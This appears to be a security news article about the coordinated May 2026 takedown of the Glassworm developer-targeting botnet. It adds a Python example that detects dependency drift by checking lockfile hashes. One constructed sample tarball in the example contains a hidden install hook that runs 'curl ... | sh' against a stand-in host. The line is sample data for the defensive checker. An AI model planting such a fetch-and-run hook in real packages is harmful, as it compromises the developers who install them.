A joint operation by CrowdStrike, Google, and the Shadowserver Foundation brought down the Glassworm botnet on May 26, 2026, by simultaneously disabling all four of its command-and-control (C2) channels in a single coordinated strike. The operation, reported by Security Affairs, took place at 14:00 UTC and was designed to prevent the botnet's operators from adapting or rerouting traffic to backup infrastructure.
The precision timing was critical. Disrupting the C2 channels one at a time would have given attackers the opportunity to pivot to alternative servers and keep the botnet alive.
A Supply-Chain Threat Built for Developers
Glassworm stood out from typical botnets because of how it spread. Rather than relying on phishing emails or exploit kits targeting end users, the malware infiltrated developer environments through poisoned tools and compromised software packages. This supply-chain approach meant that developers — often trusted as sophisticated, security-aware users — became unwitting infection vectors.
The tactic reflects a growing trend in the threat landscape. Attackers have increasingly recognized that software supply chains offer high-leverage entry points: a single compromised package can cascade into thousands of downstream installations. Recent years have seen a steady rise in malicious packages appearing in popular repositories, and Glassworm represented one of the more ambitious efforts to exploit this trust model at scale.
Why Simultaneous Takedown Mattered
Botnet operators typically build redundancy into their infrastructure. Glassworm maintained four separate C2 channels, meaning that if researchers had shut down only one or two, the remaining channels could have continued orchestrating infections and distributing updated malware payloads.
By coordinating to neutralize all four channels at exactly the same moment, the operation left no room for the attackers to react. This "one-shot" approach has become an increasingly preferred tactic among cybersecurity teams conducting botnet takedowns, as it minimizes the window during which compromised systems remain under attacker control.
Cross-Sector Collaboration Sets the Standard
The operation brought together three distinct types of organizations. CrowdStrike's Counter Adversary Operations team provided threat intelligence and technical expertise. Google contributed infrastructure and resources. The Shadowserver Foundation, a nonprofit that specializes in tracking and mitigating botnet activity, played a role in monitoring and sinkholing the C2 traffic.
This kind of cross-sector partnership — uniting a private cybersecurity firm, a major technology company, and a nonprofit — has become a hallmark of modern botnet disruption efforts. No single organization typically has visibility into the full scope of a botnet's operations, making collaboration essential for successful takedowns.
Broader Implications for the Developer Community
The Glassworm incident serves as a reminder that the tools and packages developers rely on daily can be weaponized. For the open-source and developer communities, the attack underscores the importance of verifying package integrity against pinned artifact hashes rather than version numbers alone, monitoring dependencies for unexpected changes such as a new transitive package or an artifact whose bytes change without a version bump, and adopting security practices such as software bills of materials (SBOMs) and signed releases.
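As an added illustration of the first two of those practices (this is example code written for this page, not anything from the article or from CrowdStrike, Google or Shadowserver), the Python below compares a freshly resolved dependency set against a reviewed, hash-pinned baseline. All package names, versions and tarball contents are constructed. The case it is built around is a package whose version string is unchanged but whose artifact bytes differ, which is the signal a poisoned re-upload of an existing release produces and which version-only checks never see.

```python
"""Detect dependency drift against a hash-pinned baseline.

Added example, not code from the original article or from CrowdStrike, Google
or Shadowserver. All package names, versions and archive bytes are constructed.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    package: str
    kind: str    # "new-package", "removed", "version-changed" or "hash-mismatch"
    detail: str


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an artifact's bytes, the value a lockfile should pin."""
    return hashlib.sha256(data).hexdigest()


# --- Constructed sample artifacts (stand-ins for downloaded package tarballs) ---
GOOD_TARBALL = (
    b'package/package.json\n{"name":"tiny-util","version":"1.3.0"}\n'
    b"package/index.js\nmodule.exports = x => x;\n"
)
# Same name and version as GOOD_TARBALL, but an install hook has been appended.
# The version string alone would never reveal this; the artifact hash does.
POISONED_TARBALL = GOOD_TARBALL + (
    b"package/setup.js\n"
    b"require('child_process').exec('curl http://example.invalid/p | sh');\n"
)
PAD_TARBALL = b"package/index.js\nmodule.exports = (s, n) => s.padStart(n);\n"
NEW_DEP_TARBALL = b"package/index.js\nmodule.exports = {};\n"

# The reviewed baseline: each dependency pinned to a version AND an artifact hash.
BASELINE = {
    "tiny-util": {"version": "1.3.0", "sha256": sha256_hex(GOOD_TARBALL)},
    "pad-left": {"version": "2.0.1", "sha256": sha256_hex(PAD_TARBALL)},
}

# What a fresh install resolved to, together with the bytes actually fetched.
RESOLVED = {
    "tiny-util": {"version": "1.3.0", "artifact": POISONED_TARBALL},
    "pad-left": {"version": "2.0.1", "artifact": PAD_TARBALL},
    "telemetry-helper": {"version": "0.0.1", "artifact": NEW_DEP_TARBALL},
}


def check_resolution(baseline: dict, resolved: dict) -> list[Finding]:
    """Compare a resolved dependency set with the baseline and return every deviation.

    Per package the checks run in order: unknown package, version change, then
    hash. A version change is reported on its own because the hash is expected
    to differ there and the bump itself is what needs review.
    """
    findings: list[Finding] = []
    for name, entry in sorted(resolved.items()):
        actual = sha256_hex(entry["artifact"])
        pin = baseline.get(name)
        if pin is None:
            findings.append(Finding(name, "new-package",
                f"not in baseline (version {entry['version']}, sha256 {actual[:12]}...)"))
        elif entry["version"] != pin["version"]:
            findings.append(Finding(name, "version-changed",
                f"{pin['version']} -> {entry['version']}"))
        elif actual != pin["sha256"]:
            findings.append(Finding(name, "hash-mismatch",
                f"version {pin['version']} unchanged but artifact differs: "
                f"expected {pin['sha256'][:12]}..., got {actual[:12]}..."))
    # Dependencies that vanished from the resolution deserve a look as well.
    for name in sorted(set(baseline) - set(resolved)):
        findings.append(Finding(name, "removed", "pinned in baseline but absent from resolution"))
    return findings


def is_clean(findings: list[Finding]) -> bool:
    """True only when the resolution matches the baseline exactly."""
    return not findings


if __name__ == "__main__":
    for f in check_resolution(BASELINE, RESOLVED):
        print(f"[{f.kind}] {f.package}: {f.detail}")
```

Run against the constructed data it reports `tiny-util` as a hash mismatch and `telemetry-helper` as an unreviewed new package, while `pad-left` passes. In practice the baseline is the lockfile a reviewer signed off on: npm's `package-lock.json` carries an `integrity` field per package and pip honours `--require-hashes`, so the same comparison can be driven from real lockfiles rather than the inline dictionaries used here.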
While the coordinated takedown has severed Glassworm's C2 infrastructure, compromised developer machines may still carry residual malware: a sinkholed C2 stops the operators from issuing commands, but it does not remove an implant that is already installed. Security researchers are expected to release indicators of compromise (IoCs) to help affected users identify and clean infected systems. Because developer workstations commonly hold package-registry tokens, signing keys and cloud credentials, any secrets that were reachable from an infected machine should be treated as exposed and rotated as part of the cleanup.
The operation demonstrates that even complex, well-architected botnets can be dismantled effectively when the cybersecurity community acts together — and acts fast.
